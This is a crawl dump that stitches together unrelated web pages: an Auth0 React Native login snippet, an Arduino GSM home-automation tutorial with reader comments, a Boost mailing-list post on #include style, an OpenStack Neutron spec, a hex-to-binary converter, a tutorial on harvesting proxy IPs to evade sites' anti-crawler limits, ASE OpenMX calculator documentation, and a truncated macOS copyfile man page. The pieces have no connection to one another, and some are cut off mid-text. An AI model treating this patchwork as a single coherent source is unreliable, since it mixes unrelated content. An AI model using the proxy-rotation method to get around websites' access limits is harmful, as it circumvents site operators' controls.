your application. We recommend using it for the best experience, best security and the fullest array of features. First, import the Auth0 module and create a new Auth0 instance. import Auth0 from 'react-native-auth0'; const auth0 = new Auth0({ domain: 'YOUR_DOMAIN', clientId: 'YOUR_CLIENT_ID' }); Then present the hosted login screen, like this: auth0 .webAuth .authorize({scope: 'openid profile email'}) .then(credentials => // Successfully authenticated // Store the accessToken this.setState({ accessToken: credentials.accessToken }) ) .catch(error => console.log(error)); Upon successful authentication the user's credentials will be returned, containing an access_token, an id_token and an expires_in value.'); });
https://auth0.com/docs/quickstart/native/react-native/00-login
CC-MAIN-2020-05
en
refinedweb
Mobile. Working Explanation. Circuit Components: - been. Circuit Description. #include<LiquidCrystal.h> LiquidCrystal lcd(6,7,8,9,10,11); #define Fan 3 #define Light 4 #define TV 5 int temp=0,i=0; int led=13; After this serial communication is initialized at 9600 bps and gives direction to used pin. void setup() { lcd.begin(16,2); Serial.begin(9600); pinMode(led, OUTPUT); pinMode(Fan, OUTPUT); pinMode(Light, OUTPUT); pinMode(TV,.h> LiquidCrystal lcd(6,7,8,9,10,11); #define Fan 3 #define Light 4 #define TV 5 int temp=0,i=0; int led=13; char str[15]; void setup() { lcd.begin(16,2); Serial.begin(9600); pinMode(led, OUTPUT); pinMode(Fan, OUTPUT); pinMode(Light, OUTPUT); pinMode(TV, OUTPUT); lcd.setCursor(0,0); lcd.print("GSM Control Home"); lcd.setCursor(0,1); lcd.print(" Automaton "); delay(2000); lcd.clear(); lcd.print("Circuit Digest");); } } Feb 06, 2016 Is this Code really working sir? I would like to ask for the complete code this sir, i'm interested in making this project sir! Please Send me the the Code sir! Feb 07, 2016 yes, this code will work fine. uploaded code on the website is complete. copy it and go ahead. Feb 09, 2016 Is it okay sir to use 5v-4 channels relay instead of 5v SPDT relay and a ULN2003 driver? Cause i've been trying it using your code and a relay module but it doesn't work(still without an Output connected to it). Apr 02, 2017 Hi Sadam, I have a similar project where i would like to detect water leakage and send sms to my phone, im using use an Analogue water sensor, arduino uno and a gsm shield, would you help me with a code May 22, 2017 Sir, I can't see where mobile number was used in code. Nov 11, 2017 this program will not reply anything so mobile number is not necessary Mar 17, 2018 hi saddam this project in proteus doesnt work when i dail the number in virtual terminal no responce Nov 24, 2019 hey i'm sorry but i have make the same with the project with serial and it go fine. with gsm sim908 it don't work i have use tx e rx 0/1 but also other pins with 7/8 can you help mi please thank's Feb 10, 2016 what is this? is this code need any modification E:\tim\tim.ino: In function 'void serialEvent()': E:\tim\tim.ino:54:25: warning: deprecated conversion from string constant to 'char*' [-Wwrite-strings] if(Serial.find("#A.")); ^ Feb 11, 2016 I think you should remove Semicolon from the "if statement"'. Feb 11, 2016 Thanks to your code sir! It's working but the initial state of the relay module i used is ON, and all of the commands are inverted. How can i correct this sir? Feb 11, 2016 Glad that your project is finally worked. You must have connected NC terminal of Relay to the AC appliances, instead of NO, just swap them. Check this article for Relay working. Feb 24, 2016 I make this project.but the relay not work properly. please give the information of relay connection. Feb 14, 2016 hiii dennis sir .you did this project?.can you please send me the complete code as fast as possible . my mail id is [email protected] Feb 23, 2016 @ashind The given code is complete. Feb 24, 2016 @Rajendra What do you mean by "relay not working properly", give us more detail. Circuit diagram clearly explains the connections, connect NO and NC terminals of relay properly. Apr 01, 2018 Also GM's module received the sms in sim card memory but it not sending the sms to arduuno May 10, 2018 bro i have the same problem do you solved Nov 25, 2019 i have the same problem i think there is an probleme with code comand gsm May 31, 2019 hello dennis do you still have the complete code Feb 21, 2016 may you please provide the code for the Gsm based door unlock system which allows the user to unlock the door remotely by sending an sms to the gsm module. thank you Feb 23, 2016 Check this project: Automatic Door Opener using Arduino and taking use of both of these projects, you can build one and please share with us. Feb 26, 2016 Sir Nice project Feb 26, 2016 Dear Sir I followed the your projects Sir I want to make gsm relay contorl project But I have questions Gsm module how can I interface with gsm module? Ofter set at commends do we need to delete them? Can I use 3phase motor starter contorl? Please explain me Thank you very much Feb 29, 2016 I would like to wire a 12volt battery with a 7502 voltage reg.. and a attiny 85 to get more distance with my 433mhz transmitter Mar 02, 2016 which program do you use to draw the schematic for the circuit diagram ? thank you Mar 11, 2016 Proteus with Arduino Library installed. Mar 04, 2016 CAN U PLEASE HELP ME TO SET GSM MODULE (900A)) FOR THE SAME APPLICATION Mar 11, 2016 We have already explained the setup of GSM in the above project itself. And if you want to know more, we have lot of projects which are using GSM with Arduino, go through this link and check: Mar 07, 2016 does this code is same for 8051 or diffrent if so plz provide me the 8051 code. Mar 19, 2016 this code can only used for arduino. if u are using 8051 the mode may be different Mar 20, 2016 sir why can't we use serial.find() everywhere in code instead of string operations Mar 21, 2016 sir the system works fine for 1st msg but doesnt respond to the next messages. then i have to reset the whole system to execute the message Apr 03, 2016 SIR the program is very help full Thank you very much Apr 06, 2016 sir, i did as prescribed and it is working fine with the serial monitor. but when it comes to gsm module it does not respond to the second message. ie, if i send #A.tv on* for the first time , it works fine... but then the system does not respond to whatever message i send to the gsm module.... have been with this problem for a lot of time... please help me sir.. Apr 10, 2016 For toz circuit can i use Gsm 2 click Apr 11, 2016 @ashind i m also getting the same error C:\Users\Home\Documents\Arduino\test11\test11.ino: In function 'void serialEvent()': C:\Users\Home\Documents\Arduino\test11\test11.ino:143:25: warning: deprecated conversion from string constant to 'char*' [-Wwrite-strings] if(Serial.find("#A.")) how to get rid of this error?? kindly reply soon May 01, 2016 @sneha this is not an error .this is just a warning....so dnt wrry u will get o/p Apr 13, 2016 Can i knw wat type of GSM that in use in tiz circuit .. bcos went i search Gsm Module its goes wrong can i get the full name of the GSM Apr 18, 2016 Gsm Module is SIM900A, its already given in the description. Apr 22, 2017 @Maddy can i use SIM900D over SIM900A? Apr 17, 2016 The code is not being uploaded.dnt knw y it is happening.does d code need any modification? Apr 21, 2016 no need of any modification in code. remove rx and tx pin from arduino before uploading code. Apr 28, 2016 sir, can i use sim 900A inplace of sim900. if yes, then is there any change in programme. May 07, 2016 hello sir, how i wan to caotrol 8 bulb how i proceed plzz help me May 17, 2016 ULN2003 can drive upto 7 Relays, use ULN2803 for 8 Relays. Change the code and connections accordingly. May 07, 2016 Dear Sir, Please send the GSM module to my email id. Your site is good and I am beginner. I wanted to learn. [] May 11, 2016 hii sir the above aurdino gsm program how to upload and which softaware using .i have upload but some java error is diplay May 17, 2016 Use Arduino IDE software (Arduino Nightly :) to burn the code into Arduino. May 11, 2016 Please can you help me i tried to send sms on my gsm but is not turning on any thing what is the problem and sms shows received in my mobile May 19, 2016 sir im using 12v/2A GSM module. can u please explain the current and voltage supply rating for the whole circuit. can i use 12v 2A adaptor for whole circuite..? May 20, 2016 can one use sim800 in place of sim900? May 20, 2016 will any gsm module work with the same code? May 21, 2016 Yes, any GSM module should work, just check its Tx and Rx connections. May 22, 2016 I am doing project "WIRELESS WEATHER MONITORING SYSTEM"using arduino uno, GSM sim900a, LCD 16x2, temperature and humidity sensor dht11…now I request yourgood self to please provide me a program that will display current temperature and humidity on LCD. also if we send SMS from any mobile number to a mobile number of simcard that is in GSM to send current temperature or humidity it must send back SMS to the mobile number from which it received SMS with current temperature or humidity.. May 28, 2016 Check this one :Humidity and Temperature Measurement using Arduino, and try to integrate the GSM Module. May 23, 2016 please any one can help me I asked one week before regarding this code not working for me when I send sms to gsm nothing happen even if sms shows received please please any one can help me is very nice project I need to build it my email is [] any one can post me working codes May 28, 2016 First only try to Interface GSM Module with Arduino, check here for Circuits using GSM with Arduino Jun 01, 2016 i like to share my home automation project. my project was GSM based home automation system with SMS feedback and gas leakage sms alert system with automatic power shutdown *when we sent sms to ARDUINO through GSM module. GSM module will sent an feedback sms to owners mobile number *when smoke is detected by MQ5 the Arduino will sent 3 alert sms to owners mobile number and will also shunt down the power. if anybody need this project program pleas contact me Jul 04, 2016 Sir i want to do a call based GSM module project on 8051 micro controller to control the door locking system along with other home appliances, being a new comer i need the complete detail 1) full step what can i do step by step 2) program for 8051 i shall be very thankful to you , looking forward for your kind reply Jul 09, 2016 Bro I am doing the same project plzz help me up with any data ypu have collected so far Aug 15, 2018 Hi @ashind . Your project is interesting. Please provide your project details like circuits diagram & project code. Jun 02, 2016 i really love this project...how can i buy it Jun 14, 2016 sir it's not working can we use sim900a instead of sim900 Jul 25, 2016 Dear saddam great project but some time GSM turning on leds and some time not. please explain Jul 29, 2016 Thanks. you may try with long wire antenna or also you may change your operator. and you may also change your supply source Aug 02, 2016 Can someone help me? This is my code. #include <LiquidCrystal.h> #include "SIM900.h" #include "sms.h" #include <SoftwareSerial.h> //#include <sms.h> #include <PString.h> SMSGSM sms; boolean started = false; char buffer[160]; char smsbuffer[160]; char n[20]; //LiquidCrystal lcd(4,2,3,7,8,9); int buttonState; int lastButtonState = LOW; long lastDebounceTime = 0; long debounceDelay = 50; boolean st = false; int buzzer = 12; void setup() { //lcd.begin(16, 2); Serial.begin(9600); if (gsm.begin(2400)) { started = true; } if (started) { delsms(); } sms.SendSMS("+6xxxxxxxxxx" , "Gas Sensor and GSM module activated"); } void loop() { //lcd.setCursor(0, 0); //lcd.print("Detektor Gas SMS"); int val = analogRead(A0); val = map(val, 0, 1023, 0, 100); //lcd.setCursor(0,1); //lcd.print("Kadar: "); //lcd.print(val); //lcd.print("% "); //code using sensor detection if (val > 10) { tone(buzzer,800,500); delay(1000); st = true; } else st = false; if (st != lastButtonState) { lastDebounceTime = millis(); } if ((millis() - lastDebounceTime) > debounceDelay) { if (st != buttonState) { buttonState = st; if (buttonState == HIGH) { PString str(buffer, sizeof(buffer)); str.begin(); str.print("Gas Detected! Gas leakage at "); str.print(val); str.print("%"); //String a=str; sms.SendSMS("+6xxxxxxxxxx", buffer); } } } //code using sms lapor. lastButtonState = st; int pos = 0; if (started) { pos = sms.IsSMSPresent(SMS_ALL); if (pos) { sms.GetSMS(pos, n, smsbuffer, 100); delay(2000); if (!strcmp(smsbuffer, "lapor")) { PString str(buffer, sizeof(buffer)); str.begin(); str.print("Rate of gas leakage currently at "); str.print(val); str.print("%"); //String a=str; sms.SendSMS("+6xxxxxxxxxx", buffer); } delsms(); } } } //delete sms yang dihantar void delsms() { for (int i = 0; i < 10; i++) { int pos = sms.IsSMSPresent(SMS_ALL); if (pos != 0) { if (sms.DeleteSMS(pos) == 1) {} else {} } } } code. But I want to change the second option to be auto reply to any incoming number. What should I do? Aug 04, 2016 Sir, I want to do the same project by using micro-controller 8051. As i am new comer i want detail information about it. program, all steps, if u have any video then it also etc plz send me on my email. Thanks, looking forward for your kind reply. Aug 06, 2016 Dear SK, Very nicely explained project ever I came across. It has created a lot of interest in my son including me. I thank for your sincere and fare sharing of knowledge. Thnaks a lot. Aug 14, 2016 sir if we are using microprocessor there are two circuit diagrams one is for transmitter and another is for receiver but here is only one so is it like combined or what?? Aug 20, 2016 Transmitter is our cell phone itself. Sep 13, 2016 Hi im thinking to make this project does this works properly? But ive compiled this code and it is showing some error Oct 06, 2016 Project is working properly, please share the Error you are getting. Sep 22, 2016 pliz i need to know how the program works and how i use the gsm Sep 28, 2016 can you give me the code of this project .. please modify the code please can you take the crystal or lcd ... and make it compatible with GSM sim 800L please Sep 28, 2016 I am getting error in serial.find function Sep 30, 2016 Sir. I have try Interfacing GSM Module with Arduino, its working fine. But when i try your project. The bulb does not light up when i send sms to gsm. It show that the sim card in the gsm receive the message but it keep resetting itself. Please help me Oct 02, 2016 i am not try it yet Oct 03, 2016 please help me I did all the right connections I uploaded the source code But when I send a message None of the relay switches not what is the problem? Oct 06, 2016 We have already explained the setup of GSM in the above project itself. And if you want to know more, we have lot of projects which are using GSM with Arduino, Try to interface GSM first, check: Oct 07, 2016 can someone help me pls. I connected the circuit as shown above. the LCD is ok but it is not responding to the on/off messages. I'm using sim800l. is there any modification in the program? if yes, how do I go about it? Oct 07, 2016 Hello sir, please am using SIM900A with two sets of pins (6 pins in group and 3 pins also in group), i do not know how to go about the connections since its a bit different from your own module Oct 07, 2016 Check the data sheet of your Module, you just need to find out serial communication pins Tx, Rx and power supply pins (Vcc and GND) in your GSM module. Oct 07, 2016 sir currently i have arduino mega .so can i use mega instead of arduino uno for the same program ?? Oct 07, 2016 Yes, you can use Arduino Mega Oct 11, 2016 Hi i am working on project, appliances control & switching using gsm & bluetooth , can you help? Oct 12, 2016 hye sir , do you create ur own relay circuit ? can i have the schematic . i just kind of confuse whether the relay circuit have connection that related to Arduino Uno. Oct 15, 2016 Yes, its custom created Relay Module on Dot board which has ULN2003 on it. It may available in the Market too. Pages
https://circuitdigest.com/microcontroller-projects/gsm-based-home-automation-using-arduino
CC-MAIN-2020-05
en
refinedweb
From: vesa_karvonen (vesa_karvonen_at_[hidden]) Date: 2002-02-07 07:48:45 --- In boost_at_y..., "David Abrahams" <david.abrahams_at_r...> wrote: > I agree with you that consistency is important. I don't have a > strong opinion about which way is "correct". Proof by intimidation follows... :) The first thing I would like to ask from you is to provide a list of books that have C or C++ source code snippets that use the #include <...> form to include anything else but either standard library headers or system headers (e.g. posix). For each book that you are able to find, I promise to be able to list 10 books that do not. In other words, if you find 10 books that use the #include <...> form for their own source files, I promise to find 100 books that do not. I also claim that the average technical quality of the books that I will list, according ACCU reviewers, will be higher. Don't take this too seriously! I hope that you understand what I'm getting at. "De facto" standards and "existing practice" are very important considerations. > I think on compilers > that distinguish "..." from <...> there are advantages to the user > to being able to include everything in his application with "..." > and everything outside with <...>, but I'm open to other schemes. What if a library is also an application? Do you then use: #ifdef COMPILE_AS_APP #include "otsikkotiedosto.h" #else #include <otsikkotiedosto.h> #endif everywhere so that you can choose which form to use? Which form of include do you use inside the library to include its own source files? The main problem I see with your argument is the problem of defining what exactly defines "everything in his application" and "everything outside". Especially because such things are very likely to change over time as the code base evolves. For instance, the company where I work, builds applications that consist of dozens of libraries and only relatively small "application core". Initially many of these libraries have been developed for use in only a specific application or for our own use. Which include form would you use for these libraries? However, we have licensed some of the libraries to external developers and we (well I anyway) have plans to start moving many of these libraries to open source. Which include form would you use for these libraries now? PRINCIPLE: Moving source code from one project or organization to another should not require changing it. The only clear conclusion that I can draw based on the C++ standard, existing practice and the desire to find a simple and easy way to choose the proper form of include is that: - #include <...> is reserved for standard library headers and - #include "..." is for everything else. The above rule is: - easy to define - not challenged by the C++ standard - conforms to existing practice - has extensive support in high quality C++ literature > I would love to see an argument about this which appeals to > reasoning stronger than "Bjarne thinks it should work this way" > or "lots of people do it this way". So far, I never have. It is most unfortunate that neither the C nor the C++ standard have the guts to clearly define what are the relationships of the following terms: - header - library header - standard [C/C++] library header - source file My conclusion is that the term "header" technically refers to a standard library header. I couldn't find anything in the standard that would use the term "header" to refer to a user defined files. The term "source file" refers to user defined source files. Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2002/02/24713.php
CC-MAIN-2020-05
en
refinedweb
Registering RouterInfo by L3 extension API¶ Launchpad blueprint: Currently, most plugin implementations related to L3 override the L3NATAgent class itself for their own logic since there is no proper interface to extend the RouterInfo class. This adds unnecessary complexity for developers who just want to extend the agent mechanism instead of the whole RPC related to L3 functionalities. This spec introduces the RouterFactory class which acts on the factory for creating the RouterInfo class, and adds a new parameter to the L3 agent extension API which enables it to dynamically register RouterInfo to the factory. Now plugin developers can use the new extension API for their own specific router. Problem Description¶ Current L3 agent implementation in Neutron consists of two parts in general. One is to implement an RPC Plugin API from Neutron server, and the other is to create ports, namespaces, and iptables rules using the data obtained from the RPC API on the server. To be more specific, the former is the L3NATAgent class and the latter is the RouterInfo class. The problem is that the two parts mentioned are now tightly coupled which means there is no clear way to extend each part individually. A lot of projects related to Neutron called networking-* 1, 2, 3 are making new L3 agent classes on their own by extending the L3NATAgent class even though they did not modify the RPC mechanism but only changed the RouterInfo mechanism running on their server. Also, the current RouterInfo class does not have an abstract interface which makes it harder to extend the class for plugin developers. They have to find what functions and variables in RouterInfo are externally used in the L3 agent to extend the RouterInfo behaviors. Proposed Change¶ Today, RouterInfo is extended in several ways according to specific router features such as distributed, ha, and distributed + ha. This document proposes changing the L3 agent to have a new class called RouterFactory which has several pre-registered classes to extend the RouterInfo class with certain features. When it comes to creating an actual RouterInfo instance, the L3 agent create a new instance from the RouterFactory following the features of the router. There is no functional change for existing code. L3AgentExtensionAPI now has a new parameter router_factory and a new function register_router. A new abstract class called BaseRouterInfo will be added. It will declare interfaces that are currently used externally. An L3 extension can register their own RouterInfo class which implements BaseRouterInfo using the register_router API which has two parameters. router: RouterInfo declared in extension which overrides the one pre-registered at RouterFactory features: features of RouterInfo. Currently it should be one of the below. Features should be a list of strings describing router characteristics, and the ordering does not matter since it is interpreted as a set internally. ( ['ha', 'distributed']and ['distributed', 'ha']are the same) []: No feature. (e.g. LegacyRouter) ['distributed']: Distributed router. (e.g. DvrEdgeRouter, DvrLocalRouter) ['ha']: HA router. (e.g. HaRouter) ['ha', 'distributed']: Distributed HA router. (e.g. DvrEdgeHaRouter, DvrLocalRouter) Note that a router with the feature of ['ha', 'distributed']can be DvrLocalRouterwhen L3 agent mode is not dvr_snat4. L3 extensions can override the RouterInfo class implemented in the Neutron codebase when it is initialized using the initialize function. Implementation¶ Assignee(s)¶ Yang Youseok <[email protected]> References¶ - 1 networking-odl: - 2 networking-ovn: - 3 networking-calico: - 4 - 5 - 6
https://specs.openstack.org/openstack/neutron-specs/specs/stein/router-factory-with-l3-extension.html
CC-MAIN-2020-05
en
refinedweb
Hi, I'm trying to experiment Guizero in making a simple GUI, and I'm getting this error when I run my program "Tkinter did not import successfully". I've tried uninstalling and reinstalling guizero, but no luck so far. I'm following the guide from the latest issue of PiMag. Any thoughts? my import line is as follows" from guizero import App, Text, TextBox, PUshButton, Slider
https://www.raspberrypi.org/forums/viewtopic.php?p=1167991
CC-MAIN-2020-05
en
refinedweb
Hex to Binary Converter Online Tool About Hex to Binary Converter Online Tool: This online hex to binary converter tool helps you to convert one input hex number (base 16) into a binary number (base 2).<< Hex to Binary conversion table: More information: Wikipedia (Hexadecimal): Wikipedia (Binary): Convert Hex to Binary with Python: def hex_to_binary(hex_str): decimal_number = int(hex_str, 16) binary_number = bin(decimal_number) return binary_number hex_input = 'ccccccccc' binary_output = hex_to_binary(hex_input) print('binary result is:{0}'.format(binary_output)) ------------------- binary result is:0b110011001100110011001100110011001100 Convert Hex to Binary with Java: public class NumberConvertManager { public static String hex_to_binary(String hex_input) { int decimal_int = Integer.parseInt(hex_input, 16); return Integer.toBinaryString(decimal_int); } public static void main(String[] args) { String hex_input = "f4"; String binary_output = hex_to_binary(hex_input); System.out.println("binary result is:" + binary_output); } } ------------------- binary result is:11110100
https://coding.tools/hex-to-binary
CC-MAIN-2020-05
en
refinedweb
Before we said that a common method of anti crawler is to detect IP and limit access frequency. So we need to bypass this limitation by setting up proxy ip. There are many websites that offer free proxy ip, such as. We can get a lot of proxy IP from the website. But not every of these IPS can be used, or very few can be used. We can use beautifulsoup to analyze web pages, then process, extract the proxy IP list, or use regular expressions to match. It’s faster to use regular expressions. Ip_url is, and random_hearder is a function that randomly obtains the request header. def download_page(url): headers = random_header() data = requests.get(url, headers=headers) return data def get_proxies(page_num, ip_url): available_ip = [] for page in range(1,page_num): Print ("Crawl the proxy IP of page% d"% page) url = ip_url + str(page) r = download_page(url) r.encoding = 'utf-8' pattern = re.compile('.*?.*?.*?(.*?).*?(.*?)', re.S) ip_list = re.findall(pattern, r.text) for ip in ip_list: if test_ip(ip): Print ('% s:% s passes the test and is added to the list of available agents'% (ip [0], IP [1]) available_ip.append(ip) Time. sleep (10) print ('crawl end') return available_ip After getting the ip, we also need to check the IP to make sure that the IP can be used. How to detect it? We can use proxy IP to access a website that can display the access ip, and then check the result of the request. def test_ip(ip,test_url=''): proxies={'http': ip[0]+':'+ip[1]} try_ip=ip[0] try: r=requests.get(test_url, headers=random_header(), proxies=proxies) if r.status_code==200: r.encoding='gbk' result=re.search('\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',r.text) result=result.group() print(result) If result [: 9]== try_ip [: 9]: print ('% S:% s test passes'% (ip [0], IP [1]) return True else: Print ('% s:% s carrier agent failed, using local IP'% (ip [0], IP [1]) return False else: Print ('% s:% s request code is not 200'% (ip [0], IP [1]) return False except Exception as e: print(e) Print ('% s:% s error') (ip [0], IP [1]) return False Some tutorials just get 200 HTTP status codes and think they’re successful. That’s wrong. Because proxy IP access is unsuccessful, you will default to use your own ip. Of course I can succeed with my own IP access. Finally, we need to detect IP before we use it, because you don’t know when it will not be available. So usually store more proxy ip, so as not to be useless when you need it. The code for this article refers to, and I have made some modifications.
https://developpaper.com/reptiles-2-establishment-of-proxy-ip-pool/
CC-MAIN-2020-05
en
refinedweb
From: Darin Adler (darin_at_[hidden]) Date: 2000-01-24 13:31:03 > IMO, the best resolution is a change to the Standard, allowing overloading > of functions in namespace std as long as the same semantics were preserved. > This would allow us to always use explicit qualification. Has this been > presented as an issue to the working group yet? I agree. And no, I don't think anyone has submitted a defect report to the library working group about this yet. -- Darin Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2000/01/1910.php
CC-MAIN-2020-05
en
refinedweb
OpenMX¶ Introduction¶ OpenMX (Open source package for Material eXplorer) is a software package for nano-scale material simulations based on density functional theories (DFT), norm-conserving pseudopotentials, and pseudo-atomic localized basis functions. This interface makes it possible to use OpenMX as a calculator in ASE, and also to use ASE as a post-processor for an already performed OpenMX calculation. You should import the OpenMX calculator when writing ASE code. To import into your python code, from ase.calculators.openmx import OpenMX Then you can define a calculator object and set it as the calculator of an atoms object: calc = OpenMX(**kwargs) atoms.set_calculator(calc) Environment variables¶ The environment variable ASE_OPENMX_COMMAND must point to that file. A directory containing the pseudopotential directories VPS, and it is to be put in the environment variable OPENMX_DFT_DATA_PATH. Set both environment variables in your shell configuration file: $ export OPENMX_DFT_DATA_PATH=/openmx/DFT_DATA13 $ export ASE_OPENMX_COMMAND='openmx' Keyword Arguments of OpenMX objects¶ kwargs are categorized by integer, float, string, boolean, tuple and matrix. Integer keyword argument(kwargs) is argument have integer value. For example, calc = OpenMX(scf_maxiter = 500, md_maxiter = 100, ...) as you can see, in ASE, standard format is to use lowercase alphabet. To follow this rule, every OpenMX keyword are changed to standard format. Further more, since python dose not allow dot(.) as a variable name. Every dot is changed to underbar(_). For example,: scf.maxIter -> scf_maxiter MD.maxIter -> md_maxiter Some variable such like atoms_number or species_number, which can be guessed easily, are automatically generated by the given information from atoms object. Float keywords are keyword have float type. Standard rules are applied like integer keywords. You can specify OpenMX float keywords by specifying, from ase.units import Ha calc = OpenMX(scf_criterion = 1e-6, energy_cutoff = 150 * Ry, ...) scf_criterion is correspond to scf.criterion. The other arguement energy_cutoff is a standard parameter format referencing GPAW. It acts same as scf_energycutoff. However, units are different. ASE uses standard energy unit as eV, and OpenMX scf.energycutoff uses the Rydburg unit. Thus, one have to specify the unit explicitly. This keyword and unit thing is applied to every keyword. For example, command above will be same as specifying, from ase.units import Ry calc = OpenMX(scf_criterion = 1e-6, scf_energycutoff = 150, ...) energy_cutoff is correspond to scf_energycutoff. But it is written in standard format. More standard paramters are specified in calculators/openmx/parameter.py. Bool keywords have boolean format, True or False. This will be translated On or Off when writing input file. For example, calc = OpenMX(scf_restart = True, scf_spinorbit_coupling = True, ...) String keywords are keyword have string format. For example, calc = OpenMX(scf_xctype = 'LDA', xc = 'PBE', ...) Both keyword arguments specifying exchange correlation we want to calculate. Left is written in OpenMX format and the right one is written in standard format. If calculator see contradicting arguments, it will use standard keyword xc and scf_xctype will be ignored. Tuple keywords are keyword that have length 3. For example, calc = OpenMX(scf_kgrid = (4, 4, 4), ...) Matrix keywords are keyword that have special format in OpenMX. For example,: <Definition.of.Atomic.Species H H5.0-s2p2d1 H_CA13 C C5.0-s2p2d2 C_CA13 Definition.of.Atomic.Species> This is typical example of matrix keyword. User can specify explicitly this argument using python list object. For example, calc = OpenMX(definition_of_atomic_species=[['H','H5.0-s2p2d1','H_CA13'], ['C','C5.0-s2p2d2','C_CA13']]) although user can specify it explicity, most of the case, this matrix Arguments are generated automatically by the information using Atoms object. information such like cutoff radius or… See the official OpenMX manual for more detail. The default setting used by the OpenMX interface is - class ase.calculators.openmx. OpenMX(restart=None, ignore_bad_restart_file=False, label='./openmx', atoms=None, command=None, mpi=None, pbs=None, **kwargs)[source]¶ Calculator interface to the OpenMX code. File-IO calculator. - command: str Command used to start calculation. Below follows a list with a selection of standard parameters Calculator parameters¶ By default, calculator uses \(openmx\) arguments to run the code. However, single node caluclating is not a good way to run heavy DFT calculation. Parallel computation is inevitable. In OpenMX calculator, user may choose the way to run. There are two ways to excute the code. First is to use MPI and the second is to use Plane Batch System. MPI method can be applied in general. To use it, put the mpi dictionary as a kwargs. For example, calc = OpenMX(mpi={'processes':20, 'threads':3}, ...) Similarly, You can use PBS method by specifying kwargs, calc = OpenMX(pbs={'processes':20, 'threads':3, 'walltime':'100:00:00'}, ...) Note PBS method will not be applied unless you have schedular specifically supports PBS. If your schedular support \(qsub\) command and \(qlist\) command, you may check pbs command is possible to use. Below follows a list with a selection of calculator paramters
https://wiki.fysik.dtu.dk/ase/ase/calculators/openmx.html
CC-MAIN-2020-05
en
refinedweb
copyfile(3) BSD Library Functions Manual copyfile(3) NAME copyfile, fcopyfile, copyfile_state_alloc, copyfile_state_free, copyfile_state_get, copyfile_state_set -- copy a file LIBRARY Standard C Library (libc, -lc) SYNOPSIS #include <copyfile.h> int copyfile(const char *from, const char *to, copyfile_state_t state, copyfile_flags_t flags); int fcopyfile(int from, int to, copyfile_state_t state, copyfile_flags_t flags); copyfile_state_t copyfile_state_alloc(void); int copyfile_state_free(copyfile_state_t state); int copyfile_state_get(copyfile_state_t state, uint32_t flag, void * dst); int copyfile_state_set(copyfile_state_t state, uint32_t flag, const void * src); typedef int (*copyfile_callback_t)(int what, int stage, copyfile_state_t state, const char * src, const char * dst, void * ctx); DESCRIPTION These functions are used to copy a file's data and/or metadata. (Meta- data consists of permissions, extended attributes, access control lists, and so forth.) The copyfile_state_alloc() function initializes a copyfile_state_t object (which is an opaque data type). This object can be passed to copyfile() and fcopyfile(); copyfile_state_get() and copyfile_state_set() can be used to manipulate the state (see below). The copyfile_state_free() function is used to deallocate the object and its contents. The copyfile() function can copy the named from file to the named to file; the fcopyfile() function does the same, but using the file descrip- tors of already-opened files. If the state parameter is the return value from copyfile_state_alloc(), then copyfile() and fcopyfile() will use the information from the state object; if it is NULL, then both functions will work normally, but less control will be available to the caller. The flags parameter controls which contents are copied: COPYFILE_ACL Copy the source file's access control lists. COPYFILE_STAT Copy the source file's POSIX information (mode, modifica- tion time, etc.). COPYFILE_XATTR Copy the source file's extended attributes. COPYFILE_DATA Copy the source file's data. These values may be or'd together; several convenience macros are pro- vided: COPYFILE_SECURITY Copy the source file's POSIX and ACL information; equivalent to (COPYFILE_STAT|COPYFILE_ACL). COPYFILE_METADATA Copy the metadata; equivalent to (COPYFILE_SECURITY|COPYFILE_XATTR). COPYFILE_ALL Copy the entire file; equivalent to (COPYFILE_METADATA|COPYFILE_DATA). The copyfile() and fcopyfile() functions can also have their behavior modified by the following flags: COPYFILE_RECURSIVE Causes copyfile() to recursively copy a hierarchy. This flag is not used by fcopyfile(); see below for more information. COPYFILE_CHECK Return a bitmask (corresponding to the flags argu- ment) indicating which contents would be copied; no data are actually copied. (E.g., if flags was set to COPYFILE_CHECK|COPYFILE_METADATA, and the from file had extended attributes but no ACLs, the return value would be COPYFILE_XATTR .) COPYFILE_PACK Serialize the from file. The to file is an Apple- Double-format file. COPYFILE_UNPACK Unserialize the from file. The from file is an AppleDouble-format file; the to file will have the extended attributes, ACLs, resource fork, and FinderInfo data from the to file, regardless of the flags argument passed in. COPYFILE_EXCL Fail if the to file already exists. (This is only applicable for the copyfile() function.) COPYFILE_NOFOLLOW_SRC Do not follow the from file, if it is a symbolic link. (This is only applicable for the copyfile() function.) COPYFILE_NOFOLLOW_DST Do not follow the to file, if it is a symbolic link. (This is only applicable for the copyfile() function.) COPYFILE_MOVE Unlink (using remove(3)) the from file. (This is only applicable for the copyfile() function.) No error is returned if remove(3) fails. Note that remove(3) removes a symbolic link itself, not the target of the link. COPYFILE_UNLINK Unlink the to file before starting. (This is only applicable for the copyfile() function.) COPYFILE_NOFOLLOW This is a convenience macro, equivalent to (COPYFILE_NOFOLLOW_DST|COPYFILE_NOFOLLOW_SRC). The copyfile_state_get() and copyfile_state_set() functions can be used to manipulate the copyfile_state_t object returned by copyfile_state_alloc(). In both functions, the dst parameter's type depends on the flag parameter that is passed in. COPYFILE_STATE_SRC_FD COPYFILE_STATE_DST_FD Get or set the file descriptor associated with the source (or destination) file. If this has not been initialized yet, the value will be -2. The dst (for copyfile_state_get()) and src (for copyfile_state_set()) parameters are point- ers to int. COPYFILE_STATE_SRC_FILENAME COPYFILE_STATE_DST_FILENAME Get or set the filename associated with the source (or destination) file. If it has not been initialized yet, the value will be NULL. For copyfile_state_set(), the src parameter is a pointer to a C string (i.e., char* ); copyfile_state_set() makes a pri- vate copy of this string. For copyfile_state_get() function, the dst parameter is a pointer to a pointer to a C string (i.e., char** ); the returned value is a pointer to the state 's copy, and must not be modified or released. COPYFILE_STATE_STATUS_CB Get or set the callback status function (currently only used for recursive copies; see below for details). The src parameter is a pointer to a function of type copyfile_callback_t (see above). COPYFILE_STATE_STATUS_CTX Get or set the context parameter for the status call-back function (see below for details). The src parameter is a void *. COPYFILE_STATE_QUARANTINE Get or set the quarantine information with the source file. The src parameter is a pointer to an opaque object (type void * ). COPYFILE_STATE_COPIED Get the number of data bytes copied so far. (Only valid for copyfile_state_get(); see below for more details about callbacks.) The dst parameter is a pointer to off_t (type off_t * ). COPYFILE_STATE_XATTRNAME Get the name of the 